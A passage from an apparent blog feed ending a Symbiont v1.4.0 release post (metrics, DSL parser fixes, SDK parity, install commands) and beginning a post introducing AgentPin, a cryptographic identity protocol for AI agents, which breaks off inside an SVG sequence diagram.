  <li><strong><code class="language-plaintext highlighter-rouge">MetricsCollector</code></strong>: Background thread that periodically gathers snapshots from the scheduler, task manager, load balancer, and system resources, then exports them.</li>
</ul>

<p>The <code class="language-plaintext highlighter-rouge">/api/v1/metrics</code> endpoint returns a full snapshot covering job counts, task queue depths, worker utilization, CPU, and memory usage.</p>

<h2 id="dsl-parser-improvements">DSL Parser Improvements</h2>

<p>Two small but important fixes to the DSL parser:</p>

<ul>
  <li><strong>Bare identifiers</strong>: <code class="language-plaintext highlighter-rouge">store markdown</code> and <code class="language-plaintext highlighter-rouge">provider github</code> now parse correctly — previously these required quoted strings.</li>
  <li><strong>Short-form durations</strong>: <code class="language-plaintext highlighter-rouge">90d</code>, <code class="language-plaintext highlighter-rouge">6m</code>, <code class="language-plaintext highlighter-rouge">1y</code> work alongside the existing <code class="language-plaintext highlighter-rouge">90.seconds</code> form. This makes memory retention and schedule configuration more readable.</li>
</ul>

<h2 id="sdk-parity">SDK Parity</h2>

<p>Both SDKs ship at v0.6.0 with full feature parity:</p>

<p><strong>Python SDK</strong> (<a href="https://pypi.org/project/symbiont-sdk/0.6.0/">PyPI</a>):</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">MarkdownMemoryStore</code>, <code class="language-plaintext highlighter-rouge">HmacVerifier</code>, <code class="language-plaintext highlighter-rouge">JwtVerifier</code>, <code class="language-plaintext highlighter-rouge">WebhookProvider</code></li>
  <li><code class="language-plaintext highlighter-rouge">SkillScanner</code>, <code class="language-plaintext highlighter-rouge">SkillLoader</code> with SchemaPin integration</li>
  <li><code class="language-plaintext highlighter-rouge">MetricsClient</code>, <code class="language-plaintext highlighter-rouge">FileMetricsExporter</code>, <code class="language-plaintext highlighter-rouge">CompositeExporter</code></li>
  <li>120 tests passing</li>
</ul>

<p><strong>JavaScript SDK</strong> (<a href="https://www.npmjs.com/package/symbiont-sdk-js">npm</a>):</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">MarkdownMemoryStore</code>, <code class="language-plaintext highlighter-rouge">HmacVerifier</code>, <code class="language-plaintext highlighter-rouge">JwtVerifier</code>, <code class="language-plaintext highlighter-rouge">WebhookProvider</code></li>
  <li><code class="language-plaintext highlighter-rouge">SkillScanner</code> with all 10 ClawHavoc rules</li>
  <li><code class="language-plaintext highlighter-rouge">MetricsApiClient</code>, <code class="language-plaintext highlighter-rouge">FileMetricsExporter</code></li>
  <li>1,037 tests passing</li>
</ul>

<h2 id="install">Install</h2>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Rust</span>
cargo <span class="nb">install </span>symbi

<span class="c"># Python</span>
pip <span class="nb">install </span>symbiont-sdk<span class="o">==</span>0.6.0

<span class="c"># JavaScript</span>
npm <span class="nb">install </span>symbiont-sdk-js@0.6.0

<span class="c"># Docker</span>
docker pull ghcr.io/thirdkeyai/symbi:latest
</code></pre></div></div>

<h2 id="whats-next">What’s Next</h2>

<p>v1.4.0 completes the core production feature set. The ThirdKey trust stack — <a href="https://schemapin.org">SchemaPin</a> for tool integrity, <a href="https://agentpin.org">AgentPin</a> for agent identity, and <a href="https://symbiont.dev">Symbiont</a> for runtime enforcement — now covers the full agent lifecycle from skill loading through execution to external integration.</p>

<p>Upcoming work focuses on multi-modal RAG, cross-agent knowledge synthesis, and federation protocols for multi-organization agent networks.</p>

<hr />

<p><em>Symbiont is open source under the MIT license. View the full changelog and source at <a href="https://github.com/thirdkeyai/symbiont">github.com/thirdkeyai/symbiont</a>. For enterprise support, contact <a href="mailto:enterprise@symbiont.dev">enterprise@symbiont.dev</a>.</em></p>]]></content><author><name>ThirdKey Team</name></author><category term="AI Security" /><category term="Release" /><category term="symbiont" /><category term="ai agents" /><category term="security" /><category term="webhooks" /><category term="memory" /><category term="skill scanning" /><category term="metrics" /><category term="release" /><summary type="html"><![CDATA[Symbiont v1.4.0 is here. This release adds four major capabilities to the agent runtime: persistent agent memory, cryptographic webhook verification, automated skill scanning, and metrics telemetry. Together, they close the gap between “agent that runs” and “agent you can trust in production.”]]></summary></entry><entry><title type="html">Introducing AgentPin - Cryptographic Identity for AI Agents</title><link href="http://research.thirdkey.ai/blog/introducing-agentpin/" rel="alternate" type="text/html" title="Introducing AgentPin - Cryptographic Identity for AI Agents" /><published>2026-02-13T00:00:00+00:00</published><updated>2026-02-13T00:00:00+00:00</updated><id>http://research.thirdkey.ai/blog/introducing-agentpin</id><content type="html" xml:base="http://research.thirdkey.ai/blog/introducing-agentpin/"><![CDATA[<p>AI agents are increasingly acting on our behalf — reading email, writing code, managing infrastructure, negotiating with other agents. But there’s a fundamental gap in this ecosystem: <strong>when an agent claims to be “Scout v2 from Tarnover LLC,” how does anyone verify that claim?</strong></p>

<p>Today we’re introducing <a href="https://github.com/thirdkeyai/agentpin"><strong>AgentPin</strong></a> — a domain-anchored cryptographic identity protocol for AI agents. AgentPin is the second layer in the ThirdKey trust stack, sitting between <a href="https://schemapin.org">SchemaPin</a> (tool integrity) and <a href="https://symbiont.dev">Symbiont</a> (runtime policy enforcement).</p>

<h2 id="the-problem-agent-identity-is-self-asserted">The Problem: Agent Identity is Self-Asserted</h2>

<p>In today’s agent ecosystem, identity is essentially honor-system. An agent says who it is, and everyone trusts that claim. This creates several critical attack vectors:</p>

<ul>
  <li><strong>Agent Impersonation</strong>: A malicious agent claims to be a trusted internal agent, gaining access to sensitive systems</li>
  <li><strong>Unauthorized Delegation</strong>: An agent claims it was authorized by another agent when no such delegation exists</li>
  <li><strong>Phantom Agents</strong>: Agents with no verifiable provenance operate freely within an organization</li>
  <li><strong>Capability Inflation</strong>: An agent authorized for read-only access claims write permissions</li>
</ul>

<p>These aren’t theoretical risks. As multi-agent systems grow — agents calling agents, delegating tasks, sharing context — the attack surface expands exponentially. Without cryptographic identity verification, a single impersonating agent can compromise an entire agent network.</p>

<h2 id="the-solution-domain-anchored-cryptographic-identity">The Solution: Domain-Anchored Cryptographic Identity</h2>

<p>AgentPin solves this by anchoring agent identity to domain ownership, using the same trust model that secures the web. Organizations publish cryptographic identity documents at well-known HTTPS endpoints, issue short-lived credentials to their agents, and verifiers check those credentials against the published documents.</p>

<p>No centralized registry. No blockchain. Just ECDSA P-256 signatures and DNS — infrastructure that already exists.</p>

<svg class="mermaid" id="mermaid-svg" width="100%" xmlns="http://www.w3.org/2000/svg" style="max-width: 795px;" viewBox="-104 -10 795 733" role="graphics-document document" aria-roledescription="sequence" xmlns:xlink="http://www.w3.org/1999/xlink"><style xmlns="http://www.w3.org/1999/xhtml">@import url("https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css");</style><g><rect x="461" y="647" fill="#eaeaea" stroke="#666" width="150" height="65" name="Verifier" rx="3" ry="3" class="actor actor-bottom" /><text x="536" y="679.5" dominant-baseline="central" alignment-baseline="central" class="actor actor-box" style="text-anchor: middle; font-size: 16px; font-weight: 400;"><tspan x="536" dy="0">Verifying Party</tspan></text></g><g><rect x="261" y="647" fill="#eaeaea" stroke="#666" width="150" height="65" name="Agent" rx="3" ry="3" class="actor actor-bottom" /><text x="336" y="679.5" dominant-baseline="central" alignment-baseline="central" class="actor actor-box" style="text-anchor: middle; font-size: 16px; font-weight: 400;"><tspan x="336" dy="0">AI Agent</tspan></text></g><g><rect x="0" y="647" fill="#eaeaea" stroke="#666" width="150" height="65" name="Org" rx="3" ry="3" class="actor actor-bottom" /><text x="75" y="679.5" dominant-baseline="central" alignment-baseline="central" class="actor actor-box" style="text-anchor: middle; font-size: 16px; font-weight: 400;"><tspan x="75" dy="-8">Organization</tspan></text><text x="75" y="679.5" dominant-baseline="central" alignment-baseline="central" class="actor actor-box" style="text-anchor: middle; font-size: 16px; font-weight: 400;"><tspan x="75" dy="8">(example.com)</tspan></text></g><g><line id="actor2" x1="536" y1="65" x2="536" y2="647" class="actor-line 200" stroke-width="0.5px" stroke="#999" name="Verifier" /><g id="root-2"><rect x="461" y="0" fill="#eaeaea" stroke="#666" width="150" height="65" name="Verifier" rx="3" ry="3" class="actor actor-top" /><text x="536" y="32.5" dominant-baseline="central" alignment-baseline="central" class="actor actor-box" style="text-anchor: middle; font-size: 16px; font-weight: 400;"><tspan x="536" dy="0">Verifying Party</tspan></text></g></g><g><line id="actor1" x1="336" y1="65" x2="336" y2="647" class="actor-line 200" stroke-width="0.5px" stroke="#999" name="Agent" /><g id="root-1"><rect x="261" y="0" fill="#eaeaea" stroke="#666" width="150" height="65" name="Agent" rx="3" ry="3" class="actor actor-top" /><text x="336" y="32.5" dominant-baseline="central" alignment-baseline="central" class="actor actor-box" style="text-anchor: middle; font-size: 16px; font-weight: 400;"><tspan x="336" dy="0">AI Agent</tspan></text></g></g><g><line id="actor0" x1="75" y1="65" x2="75" y2="647" class="actor-line 200" stroke-width="0.5px" stroke="#999" name="Org" /><g id="root-0"><rect x="0" y="0" fill="#eaeaea" stroke="#666" width="150" height="65" name="Org" rx="3" ry="3" class="actor actor-top" /><text x="75" y="32.5" dominant-baseline="central" alignment-baseline="central" class="actor actor-box" style="text-anchor: middle; font-size: 16px; font-weight: 400;"><tspan x="75" dy="-8">Organization</tspan></text><text x="75" y="32.5" dominant-baseline="central" alignment-baseline="central" class="actor actor-box" style="text-anchor: middle; font-size: 16px; font-weight: 400;"><tspan x="75" dy="8">(example.com)</tspan></text></g></g><style>#mermaid-svg{font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#ccc;}@keyframes edge-animation-frame{from{stroke-dashoffset:0;}}@keyframes dash{to{stroke-dashoffset:0;}}#mermaid-svg .edge-animation-slow{stroke-dasharray:9,5!important;stroke-dashoffset:900;animation:dash 50s linear infinite;stroke-linecap:round;}#mermaid-svg .edge-animation-fast{stroke-dasharray:9,5!important;stroke-dashoffset:900;animation:dash 20s linear infinite;stroke-linecap:round;}#mermaid-svg .error-icon{fill:#a44141;}#mermaid-svg .error-text{fill:#ddd;stroke:#ddd;}#mermaid-svg .edge-thickness-normal{stroke-width:1px;}#mermaid-svg .edge-thickness-thick{stroke-width:3.5px;}#mermaid-svg .edge-pattern-solid{stroke-dasharray:0;}#mermaid-svg .edge-thickness-invisible{stroke-width:0;fill:none;}#mermaid-svg .edge-pattern-dashed{stroke-dasharray:3;}#mermaid-svg .edge-pattern-dotted{stroke-dasharray:2;}#mermaid-svg .marker{fill:lightgrey;stroke:lightgrey;}#mermaid-svg .marker.cross{stroke:lightgrey;}#mermaid-svg svg{font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;}#mermaid-svg p{margin:0;}#mermaid-svg .actor{stroke:#ccc;fill:#1f2020;}#mermaid-svg text.actor&gt;tspan{fill:lightgrey;stroke:none;}#mermaid-svg .actor-line{stroke:#ccc;}#mermaid-svg .innerArc{stroke-width:1.5;stroke-dasharray:none;}#mermaid-svg .messageLine0{stroke-width:1.5;stroke-dasharray:none;stroke:lightgrey;}#mermaid-svg .messageLine1{stroke-width:1.5;stroke-dasharray:2,2;stroke:lightgrey;}#mermaid-svg #arrowhead path{fill:lightgrey;stroke:lightgrey;}#mermaid-svg .sequenceNumber{fill:black;}#mermaid-svg #sequencenumber{fill:lightgrey;}#mermaid-svg #crosshead path{fill:lightgrey;stroke:lightgrey;}#mermaid-svg .messageText{fill:lightgrey;stroke:none;}#mermaid-svg .labelBox{stroke:#ccc;fill:#1f2020;}#mermaid-svg .labelText,#mermaid-svg .labelText&gt;tspan{fill:lightgrey;stroke:none;}#mermaid-svg .loopText,#mermaid-svg .loopText&gt;tspan{fill:lightgrey;stroke:none;}#mermaid-svg .loopLine{stroke-width:2px;stroke-dasharray:2,2;stroke:#ccc;fill:#ccc;}#mermaid-svg .note{stroke:hsl(180, 0%, 18.3529411765%);fill:hsl(180, 1.5873015873%, 28.3529411765%);}#mermaid-svg .noteText,#mermaid-svg .noteText&gt;tspan{fill:rgb(183.8476190475, 181.5523809523, 181.5523809523);stroke:none;}#mermaid-svg .activation0{fill:hsl(180, 1.5873015873%, 28.3529411765%);stroke:#ccc;}#mermaid-svg .activation1{fill:hsl(180, 1.5873015873%, 28.3529411765%);stroke:#ccc;}#mermaid-svg .activation2{fill:hsl(180, 1.5873015873%, 28.3529411765%);stroke:#ccc;}#mermaid-svg .actorPopupMenu{position:absolute;}#mermaid-svg .actorPopupMenuPanel{position:absolute;fill:#1f2020;box-shadow:0px 8px 16px 0px rgba(0,0,0,0.2);filter:drop-shadow(3px 5px 2px rgb(0 0 0 / 0.4));}#mermaid-svg .actor-man line{stroke:#ccc;fill:#1f2020;}#mermaid-svg .actor-man circle,#mermaid-svg line{stroke:#ccc;fill:#1f2020;stroke-width:2px;}#mermaid-svg :root{--mermaid-font-family:"trebuchet ms",verdana,arial,sans-serif;}</style><g /><defs><symbol id="computer" width="24" height="24"><path transform="scale(.5)" d="M2 2v13h20v-13h-20zm18 11h-16v-9h16v9zm-10.228 6l.466-1h3.524l.467 1h-4.457zm14.228 3h-24l2-6h2.104l-1.33 4h18.45l-1.297-4h2.073l2 6zm-5-10h-14v-7h14v7z" /></symbol></defs><defs><symbol id="database" fill-rule="evenodd" clip-rule="evenodd"><path transform="scale(.5)" d="M12.258.001l.256.004.255.005.253.008.251.01.249.012.247.015.246.016.242.019.241.02.239.023.236.024.233.027.231.028.229.031.225.032.223.034.22.036.217.038.214.04.211.041.208.043.205.045.201.046.198.048.194.05.191.051.187.053.183.054.18.056.175.057.172.059.168.06.163.061.16.063.155.064.15.066.074.033.073.033.071.034.07.034.069.035.068.035.067.035.066.035.064.036.064.036.062.036.06.036.06.037.058.037.058.037.055.038.055.038.053.038.052.038.051.039.05.039.048.039.047.039.045.04.044.04.043.04.041.04.04.041.039.041.037.041.036.041.034.041.033.042.032.042.03.042.029.042.027.042.026.043.024.043.023.043.021.043.02.043.018.044.017.043.015.044.013.044.012.044.011.045.009.044.007.045.006.045.004.045.002.045.001.045v17l-.001.045-.002.045-.004.045-.006.045-.007.045-.009.044-.011.045-.012.044-.013.044-.015.044-.017.043-.018.044-.02.043-.021.043-.023.043-.024.043-.026.043-.027.042-.029.042-.03.042-.032.042-.033.042-.034.041-.036.041-.037.041-.039.041-.04.041-.041.04-.043.04-.044.04-.045.04-.047.039-.048.039-.05.039-.051.039-.052.038-.053.038-.055.038-.055.038-.058.037-.058.037-.06.037-.06.036-.062.036-.064.036-.064.036-.066.035-.067.035-.068.035-.069.035-.07.034-.071.034-.073.033-.074.033-.15.066-.155.064-.16.063-.163.061-.168.06-.172.059-.175.057-.18.056-.183.054-.187.053-.191.051-.194.05-.198.048-.201.046-.205.045-.208.043-.211.041-.214.04-.217.038-.22.036-.223.034-.225.032-.229.031-.231.028-.233.027-.236.024-.239.023-.241.02-.242.019-.246.016-.247.015-.249.012-.251.01-.253.008-.255.005-.256.004-.258.001-.258-.001-.256-.004-.255-.005-.253-.008-.251-.01-.249-.012-.247-.015-.245-.016-.243-.019-.241-.02-.238-.023-.236-.024-.234-.027-.231-.028-.228-.031-.226-.032-.223-.034-.22-.036-.217-.038-.214-.04-.211-.041-.208-.043-.204-.045-.201-.046-.198-.048-.195-.05-.19-.051-.187-.053-.184-.054-.179-.056-.176-.057-.172-.059-.167-.06-.164-.061-.159-.063-.155-.064-.151-.066-.074-.033-.072-.033-.072-.034-.07-.034-.069-.035-.068-.035-.067-.035-.066-.035-.064-.036-.063-.036-.062-.036-.061-.036-.06-.037-.058-.037-.057-.037-.056-.038-.055-.038-.053-.038-.052-.038-.051-.039-.049-.039-.049-.039-.046-.039-.046-.04-.044-.04-.043-.04-.041-.04-.04-.041-.039-.041-.037-.041-.036-.041-.034-.041-.033-.042-.032-.042-.03-.042-.029-.042-.027-.042-.026-.043-.024-.043-.023-.043-.021-.043-.02-.043-.018-.044-.017-.043-.015-.044-.013-.044-.012-.044-.011-.045-.009-.044-.007-.045-.006-.045-.004-.045-.002-.045-.001-.045v-17l.001-.045.002-.045.004-.045.006-.045.007-.045.009-.044.011-.045.012-.044.013-.044.015-.044.017-.043.018-.044.02-.043.021-.043.023-.043.024-.043.026-.043.027-.042.029-.042.03-.042.032-.042.033-.042.034-.041.036-.041.037-.041.039-.041.04-.041.041-.04.043-.04.044-.04.046-.04.046-.039.049-.039.049-.039.051-.039.052-.038.053-.038.055-.038.056-.038.057-.037.058-.037.06-.037.061-.036.062-.036.063-.036.064-.036.066-.035.067-.035.068-.035.069-.035.07-.034.072-.034.072-.033.074-.033.151-.066.155-.064.159-.063.164-.061.167-.06.172-.059.176-.057.179-.056.184-.054.187-.053.19-.051.195-.05.198-.048.201-.046.204-.045.208-.043.211-.041.214-.04.217-.038.22-.036.223-.034.226-.032.228-.031.231-.028.234-.027.236-.024.238-.023.241-.02.243-.019.245-.016.247-.015.249-.012.251-.01.253-.008.255-.005.256-.004.258-.001.258.001zm-9.258 20.499v.01l.001.021.003.021.004.022.005.021.006.022.007.022.009.023.01.022.011.023.012.023.013.023.015.023.016.024.017.023.018.024.019.024.021.024.022.025.023.024.024.025.052.049.056.05.061.051.066.051.07.051.075.051.079.052.084.052.088.052.092.052.097.052.102.051.105.052.11.052.114.051.119.051.123.051.127.05.131.05.135.05.139.048.144.049.147.047.152.047.155.047.16.045.163.045.167.043.171.043.176.041.178.041.183.039.187.039.19.037.194.035.197.035.202.033.204.031.209.03.212.029.216.027.219.025.222.024.226.021.23.02.233.018.236.016.24.015.243.012.246.01.249.008.253.005.256.004.259.001.26-.001.257-.004.254-.005.25-.008.247-.011.244-.012.241-.014.237-.016.233-.018.231-.021.226-.021.224-.024.22-.026.216-.027.212-.028.21-.031.205-.031.202-.034.198-.034.194-.036.191-.037.187-.039.183-.04.179-.04.175-.042.172-.043.168-.044.163-.045.16-.046.155-.046.152-.047.148-.048.143-.049.139-.049.136-.05.131-.05.126-.05.123-.051.118-.052.114-.051.11-.052.106-.052.101-.052.096-.052.092-.052.088-.053.083-.051.079-.052.074-.052.07-.051.065-.051.06-.051.056-.05.051-.05.023-.024.023-.025.021-.024.02-.024.019-.024.018-.024.017-.024.015-.023.014-.024.013-.023.012-.023.01-.023.01-.022.008-.022.006-.022.006-.022.004-.022.004-.021.001-.021.001-.021v-4.127l-.077.055-.08.053-.083.054-.085.053-.087.052-.09.052-.093.051-.095.05-.097.05-.1.049-.102.049-.105.048-.106.047-.109.047-.111.046-.114.045-.115.045-.118.044-.12.043-.122.042-.124.042-.126.041-.128.04-.13.04-.132.038-.134.038-.135.037-.138.037-.139.035-.142.035-.143.034-.144.033-.147.032-.148.031-.15.03-.151.03-.153.029-.154.027-.156.027-.158.026-.159.025-.161.024-.162.023-.163.022-.165.021-.166.02-.167.019-.169.018-.169.017-.171.016-.173.015-.173.014-.175.013-.175.012-.177.011-.178.01-.179.008-.179.008-.181.006-.182.005-.182.004-.184.003-.184.002h-.37l-.184-.002-.184-.003-.182-.004-.182-.005-.181-.006-.179-.008-.179-.008-.178-.01-.176-.011-.176-.012-.175-.013-.173-.014-.172-.015-.171-.016-.17-.017-.169-.018-.167-.019-.166-.02-.165-.021-.163-.022-.162-.023-.161-.024-.159-.025-.157-.026-.156-.027-.155-.027-.153-.029-.151-.03-.15-.03-.148-.031-.146-.032-.145-.033-.143-.034-.141-.035-.14-.035-.137-.037-.136-.037-.134-.038-.132-.038-.13-.04-.128-.04-.126-.041-.124-.042-.122-.042-.12-.044-.117-.043-.116-.045-.113-.045-.112-.046-.109-.047-.106-.047-.105-.048-.102-.049-.1-.049-.097-.05-.095-.05-.093-.052-.09-.051-.087-.052-.085-.053-.083-.054-.08-.054-.077-.054v4.127zm0-5.654v.011l.001.021.003.021.004.021.005.022.006.022.007.022.009.022.01.022.011.023.012.023.013.023.015.024.016.023.017.024.018.024.019.024.021.024.022.024.023.025.024.024.052.05.056.05.061.05.066.051.07.051.075.052.079.051.084.052.088.052.092.052.097.052.102.052.105.052.11.051.114.051.119.052.123.05.127.051.131.05.135.049.139.049.144.048.147.048.152.047.155.046.16.045.163.045.167.044.171.042.176.042.178.04.183.04.187.038.19.037.194.036.197.034.202.033.204.032.209.03.212.028.216.027.219.025.222.024.226.022.23.02.233.018.236.016.24.014.243.012.246.01.249.008.253.006.256.003.259.001.26-.001.257-.003.254-.006.25-.008.247-.01.244-.012.241-.015.237-.016.233-.018.231-.02.226-.022.224-.024.22-.025.216-.027.212-.029.21-.03.205-.032.202-.033.198-.035.194-.036.191-.037.187-.039.183-.039.179-.041.175-.042.172-.043.168-.044.163-.045.16-.045.155-.047.152-.047.148-.048.143-.048.139-.05.136-.049.131-.05.126-.051.123-.051.118-.051.114-.052.11-.052.106-.052.101-.052.096-.052.092-.052.088-.052.083-.052.079-.052.074-.051.07-.052.065-.051.06-.05.056-.051.051-.049.023-.025.023-.024.021-.025.02-.024.019-.024.018-.024.017-.024.015-.023.014-.023.013-.024.012-.022.01-.023.01-.023.008-.022.006-.022.006-.022.004-.021.004-.022.001-.021.001-.021v-4.139l-.077.054-.08.054-.083.054-.085.052-.087.053-.09.051-.093.051-.095.051-.097.05-.1.049-.102.049-.105.048-.106.047-.109.047-.111.046-.114.045-.115.044-.118.044-.12.044-.122.042-.124.042-.126.041-.128.04-.13.039-.132.039-.134.038-.135.037-.138.036-.139.036-.142.035-.143.033-.144.033-.147.033-.148.031-.15.03-.151.03-.153.028-.154.028-.156.027-.158.026-.159.025-.161.024-.162.023-.163.022-.165.021-.166.02-.167.019-.169.018-.169.017-.171.016-.173.015-.173.014-.175.013-.175.012-.177.011-.178.009-.179.009-.179.007-.181.007-.182.005-.182.004-.184.003-.184.002h-.37l-.184-.002-.184-.003-.182-.004-.182-.005-.181-.007-.179-.007-.179-.009-.178-.009-.176-.011-.176-.012-.175-.013-.173-.014-.172-.015-.171-.016-.17-.017-.169-.018-.167-.019-.166-.02-.165-.021-.163-.022-.162-.023-.161-.024-.159-.025-.157-.026-.156-.027-.155-.028-.153-.028-.151-.03-.15-.03-.148-.031-.146-.033-.145-.033-.143-.033-.141-.035-.14-.036-.137-.036-.136-.037-.134-.038-.132-.039-.13-.039-.128-.04-.126-.041-.124-.042-.122-.043-.12-.043-.117-.044-.116-.044-.113-.046-.112-.046-.109-.046-.106-.047-.105-.048-.102-.049-.1-.049-.097-.05-.095-.051-.093-.051-.09-.051-.087-.053-.085-.052-.083-.054-.08-.054-.077-.054v4.139zm0-5.666v.011l.001.02.003.022.004.021.005.022.006.021.007.022.009.023.01.022.011.023.012.023.013.023.015.023.016.024.017.024.018.023.019.024.021.025.022.024.023.024.024.025.052.05.056.05.061.05.066.051.07.051.075.052.079.051.084.052.088.052.092.052.097.052.102.052.105.051.11.052.114.051.119.051.123.051.127.05.131.05.135.05.139.049.144.048.147.048.152.047.155.046.16.045.163.045.167.043.171.043.176.042.178.04.183.04.187.038.19.037.194.036.197.034.202.033.204.032.209.03.212.028.216.027.219.025.222.024.226.021.23.02.233.018.236.017.24.014.243.012.246.01.249.008.253.006.256.003.259.001.26-.001.257-.003.254-.006.25-.008.247-.01.244-.013.241-.014.237-.016.233-.018.231-.02.226-.022.224-.024.22-.025.216-.027.212-.029.21-.03.205-.032.202-.033.198-.035.194-.036.191-.037.187-.039.183-.039.179-.041.175-.042.172-.043.168-.044.163-.045.16-.045.155-.047.152-.047.148-.048.143-.049.139-.049.136-.049.131-.051.126-.05.123-.051.118-.052.114-.051.11-.052.106-.052.101-.052.096-.052.092-.052.088-.052.083-.052.079-.052.074-.052.07-.051.065-.051.06-.051.056-.05.051-.049.023-.025.023-.025.021-.024.02-.024.019-.024.018-.024.017-.024.015-.023.014-.024.013-.023.012-.023.01-.022.01-.023.008-.022.006-.022.006-.022.004-.022.004-.021.001-.021.001-.021v-4.153l-.077.054-.08.054-.083.053-.085.053-.087.053-.09.051-.093.051-.095.051-.097.05-.1.049-.102.048-.105.048-.106.048-.109.046-.111.046-.114.046-.115.044-.118.044-.12.043-.122.043-.124.042-.126.041-.128.04-.13.039-.132.039-.134.038-.135.037-.138.036-.139.036-.142.034-.143.034-.144.033-.147.032-.148.032-.15.03-.151.03-.153.028-.154.028-.156.027-.158.026-.159.024-.161.024-.162.023-.163.023-.165.021-.166.02-.167.019-.169.018-.169.017-.171.016-.173.015-.173.014-.175.013-.175.012-.177.01-.178.01-.179.009-.179.007-.181.006-.182.006-.182.004-.184.003-.184.001-.185.001-.185-.001-.184-.001-.184-.003-.182-.004-.182-.006-.181-.006-.179-.007-.179-.009-.178-.01-.176-.01-.176-.012-.175-.013-.173-.014-.172-.015-.171-.016-.17-.017-.169-.018-.167-.019-.166-.02-.165-.021-.163-.023-.162-.023-.161-.024-.159-.024-.157-.026-.156-.027-.155-.028-.153-.028-.151-.03-.15-.03-.148-.032-.146-.032-.145-.033-.143-.034-.141-.034-.14-.036-.137-.036-.136-.037-.134-.038-.132-.039-.13-.039-.128-.041-.126-.041-.124-.041-.122-.043-.12-.043-.117-.044-.116-.044-.113-.046-.112-.046-.109-.046-.106-.048-.105-.048-.102-.048-.1-.05-.097-.049-.095-.051-.093-.051-.09-.052-.087-.052-.085-.053-.083-.053-.08-.054-.077-.054v4.153zm8.74-8.179l-.257.004-.254.005-.25.008-.247.011-.244.012-.241.014-.237.016-.233.018-.231.021-.226.022-.224.023-.22.026-.216.027-.212.028-.21.031-.205.032-.202.033-.198.034-.194.036-.191.038-.187.038-.183.04-.179.041-.175.042-.172.043-.168.043-.163.045-.16.046-.155.046-.152.048-.148.048-.143.048-.139.049-.136.05-.131.05-.126.051-.123.051-.118.051-.114.052-.11.052-.106.052-.101.052-.096.052-.092.052-.088.052-.083.052-.079.052-.074.051-.07.052-.065.051-.06.05-.056.05-.051.05-.023.025-.023.024-.021.024-.02.025-.019.024-.018.024-.017.023-.015.024-.014.023-.013.023-.012.023-.01.023-.01.022-.008.022-.006.023-.006.021-.004.022-.004.021-.001.021-.001.021.001.021.001.021.004.021.004.022.006.021.006.023.008.022.01.022.01.023.012.023.013.023.014.023.015.024.017.023.018.024.019.024.02.025.021.024.023.024.023.025.051.05.056.05.06.05.065.051.07.052.074.051.079.052.083.052.088.052.092.052.096.052.101.052.106.052.11.052.114.052.118.051.123.051.126.051.131.05.136.05.139.049.143.048.148.048.152.048.155.046.16.046.163.045.168.043.172.043.175.042.179.041.183.04.187.038.191.038.194.036.198.034.202.033.205.032.21.031.212.028.216.027.22.026.224.023.226.022.231.021.233.018.237.016.241.014.244.012.247.011.25.008.254.005.257.004.26.001.26-.001.257-.004.254-.005.25-.008.247-.011.244-.012.241-.014.237-.016.233-.018.231-.021.226-.022.224-.023.22-.026.216-.027.212-.028.21-.031.205-.032.202-.033.198-.034.194-.036.191-.038.187-.038.183-.04.179-.041.175-.042.172-.043.168-.043.163-.045.16-.046.155-.046.152-.048.148-.048.143-.048.139-.049.136-.05.131-.05.126-.051.123-.051.118-.051.114-.052.11-.052.106-.052.101-.052.096-.052.092-.052.088-.052.083-.052.079-.052.074-.051.07-.052.065-.051.06-.05.056-.05.051-.05.023-.025.023-.024.021-.024.02-.025.019-.024.018-.024.017-.023.015-.024.014-.023.013-.023.012-.023.01-.023.01-.022.008-.022.006-.023.006-.021.004-.022.004-.021.001-.021.001-.021-.001-.021-.001-.021-.004-.021-.004-.022-.006-.021-.006-.023-.008-.022-.01-.022-.01-.023-.012-.023-.013-.023-.014-.023-.015-.024-.017-.023-.018-.024-.019-.024-.02-.025-.021-.024-.023-.024-.023-.025-.051-.05-.056-.05-.06-.05-.065-.051-.07-.052-.074-.051-.079-.052-.083-.052-.088-.052-.092-.052-.096-.052-.101-.052-.106-.052-.11-.052-.114-.052-.118-.051-.123-.051-.126-.051-.131-.05-.136-.05-.139-.049-.143-.048-.148-.048-.152-.048-.155-.046-.16-.046-.163-.045-.168-.043-.172-.043-.175-.042-.179-.041-.183-.04-.187-.038-.191-.038-.194-.036-.198-.034-.202-.033-.205-.032-.21-.031-.212-.028-.216-.027-.22-.026-.224-.023-.226-.022-.231-.021-.233-.018-.237-.016-.241-.014-.244-.012-.247-.011-.25-.008-.254-.005-.257-.004-.26-.001-.26.001z" /></symbol></defs><defs><symbol id="clock" width="24" height="24"><path transform="scale(.5)" d="M12 2c5.514 0 10 4.486 10 10s-4.486 10-10 10-10-4.486-10-10 4.486-10 10-10zm0-2c-6.627 0-12 5.373-12 12s5.373 12 12 12 12-5.373 12-12-5.373-12-12-12zm5.848 12.459c.202.038.202.333.001.372-1.907.361-6.045 1.111-6.547 1.111-.719 0-1.301-.582-1.301-1.301 0-.512.77-5.447 1.125-7.445.034-.192.312-.181.343.014l.985 6.238 5.394 1.011z" /></symbol></defs><defs><marker id="arrowhead" refX="7.9" refY="5" markerUnits="userSpaceOnUse" markerWidth="12" markerHeight="12" orient="auto-start-reverse"><path d="M -1 0 L 10 5 L 0 10 z" /></marker></defs><defs><marker id="crosshead" markerWidth="15" markerHeight="8" orient="auto" refX="4" refY="4.5"><path fill="none" stroke="#000000" stroke-width="1pt" d="M 1,2 L 6,7 M 6,2 L 1,7" style="stroke-dasharray: 0, 0;" /></marker></defs><defs><marker id="filled-head" refX="15.5" refY="7" markerWidth="20" markerHeight="28" orient="auto"><path d="M 18,7 L9,13 L14,7 L9,1 Z" /></marker></defs><defs><marker id="sequencenumber" refX="15" refY="15" markerWidth="60" markerHeight="40" orient="auto"><circle cx="15" cy="15" r="6" /></marker></defs><text x="76" y="80" text-anchor="middle" dominant-baseline="middle" alignment-baseline="middle" class="messageText" dy="1em" style="font-size: 16px; font-weight: 400;">Generate ES256 keypair</text><path d="M 76,111 C 136,101 136,141 76,131" class="messageLine0" stroke-width="2" stroke="none" marker-end="url(#arrowhead)" style="fill: none;" /><text x="76" y="156" text-anchor="middle" dominant-baseline="middle" alignment-baseline="middle" class="messageText" dy="1em" style="font-size: 16px; font-weight: 400;">Publish 